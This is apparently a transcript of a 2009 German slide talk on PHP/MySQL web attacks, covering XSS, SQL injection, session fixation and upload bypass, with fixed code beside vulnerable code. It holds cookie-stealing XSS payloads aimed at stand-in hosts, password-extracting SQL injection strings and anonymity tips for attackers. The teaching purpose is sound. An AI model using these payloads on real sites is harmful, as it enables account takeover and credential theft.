Webhacks am Beispiel PHP + MySQL

> > webHacks am Beispiel PHP & MySQL Referent: Torben Brodt Datum: 26.03.2009 Veranstalter: plista.com GmbH

webHacks > Inhalt
Übersicht
Paris Hilton Bug
XSS
SQL Injections
5. Session Stealing 6. File Inclusion 7. Technikausblick 8. Literatur
Übersicht
Paris Hilton Bug
XSS
SQL Injections
Referent: Torben Brodt Datum: 26.03.2009 Veranstalter: plista.com GmbH

webHacks > Übersicht
BufferOverflows und andere Schwachstellen, wie man sie von Desktopapplikationen kennt sind im Web kaum kritisch.
Aktuelle Lücken in Websoftware, siehe Graph [1]
Oft in Kombination genutzt
1 /8

webHacks > Paris Hilton Bug
Paris' Account wurde gehackt, weil sie bei der "Passwort-vergessen-Frage" die Frage nach dem Namen ihres Hundes wählte.
Dieser lässt sich mit einfacher
Google Recherche herausfinden
Mangelndes Sicherheitsbewusstsein
gibt es sowohl auf Konsumenten
als auch auf Endkunden-Seite
Beispiele u.a. Paymentanbieter
2 /8

webHacks > XSS (1)
XSS = ”Cross Site Scripting”
Angreifer manipuliert Webseite mit Client-Script (JS,...)
z.B. durch search.php?q=<img src=”paris...” />
Nutzen? Session ID kann ausgelesen werden – dadurch kann Person2 die Identität annehmen
Beispiel
3 /8
<script>document.write("<img src=http://hack.com/” + document.cookie + “>”)</script>

webHacks > XSS (2)
Den Login einer anderen Seite erfahren
Dort kann davon ausgegangen werden dass der benutzer noch angemeldet ist
Beispiel: studivz gruppenseite verlinkt auf eigene Seite – und wird von dort zurück geleitet
Beispiel
3 /8
<script>document.location='http://studivz.net/?supersearch=<script>document. write("<img src=http://hacker.com/" + document.cookie + ">")</script>'</script>

webHacks > SQL Injections (1)
Geschützte Informationen auslesen
Beispiel: Produktkatalog
4 /8 $res = mysql_query('SELECT titel FROM category WHERE name = ”'.$_GET['q'].'”'); while($row = mysql_fetch_array($res)) { printf("<li>%s</li>", $row['titel']); } katalog.php?q=” UNION SELECT password AS titel FROM users WHERE ”a” = ”a $res = mysql_query(...WHERE name = ”'.mysql_real_escape_string($_GET['q']).'”'); while($row = mysql_fetch_array($res)) { printf("<li>%s</li>", $row['titel']); } SAFE

Geschützte Informationen auslesen
Beispiel: Produktkatalog (mit Integer)
4 /8 $res = mysql_query('SELECT titel FROM category WHERE id = '.mysql_real_escape_string($_GET['q'])); while($row = mysql_fetch_array($res)) { printf("<li>%s</li>", $row['titel']); } katalog.php?q=0 UNION SELECT password AS titel FROM users $res = mysql_query('SELECT titel FROM category WHERE id = '.intval($_GET['q'])); SAFE

Beispiel: Newsletter abbestellen
Wäre die 10 eine austauschbare Variable könnte man die Aktion durch ” 1 OR 1 ” für alle übernehmen
4 /8 mysql_query('UPDATE user SET newsletter = '.$_REQUEST['news'].' WHERE userid = 10'); newsletter.php?news=0,pwd=(SELECT pwd FROM user WHERE userid=1)

webHacks > Session Stealing
Szenario:
Angreifer ruft Anwendung als anonymer Nutzer und erhält Session 123.
Angreifer gestaltet damit speziellen Link. Diesen lässt er dem Opfer zukommen.
Opfer verwendet Link, um zur Anwendung zu gelangen. Meldet sich an.
Anwendung übernimmt Sessionkennung und ordnet dieser den korrekt Login zu
Auch der Angreifer kann diese Session nutzen, da HTTP zustandslos
Demo: Session VS Referer
5 /8

webHacks > File Inclusion
Dateiname kann nullterminiert werden
Dadurch wird der Regex passiert, aber der Dateiname im Filesystem wird abgeschnitten
6 /8 if(preg_match('/.(png|gif|jpg)$/', $_FILES['img']['name'])) { move_uploaded_file($_FILES['img']['tmp_name'], 'upload/'.$_FILES['img']['name']); echo "upload success"; } … POST Request Manipulation Content-Disposition: form-data; name="img"; filename="hack.php.png" Content-Type: image/jpeg Content-Transfer-Encoding: binary

webHacks > Technikausblick
Phishing? E-Mail Header Manipulation?
Vorsicht durch Versionsunterdrückung.
Wie Anonym bleiben?
google link einbauen
onion ring network (tor)
remote login (vpn)
Andere unsichere Rechner benutzen
--- THE END ---
Diskussion + Fragen + Erfahrungen
7 /8

webHacks > Literatur 8 /8
[1] http://www.easy-coding.de/vortrag-sicherheitsluecken-in-websoftware-t4236.html
[2] http://www.easy-coding.de/php-und-sicherheit-teil-1-sessions-t6000.html
[3] http://www.erich-kachel.de/

Webhacks am Beispiel PHP + MySQL

by Torben Brodt on Mar 27, 2009

Accessibility

Categories

Tags

Upload Details

Usage Rights

1 Embed 8

Statistics

Webhacks am Beispiel PHP + MySQL — Presentation Transcript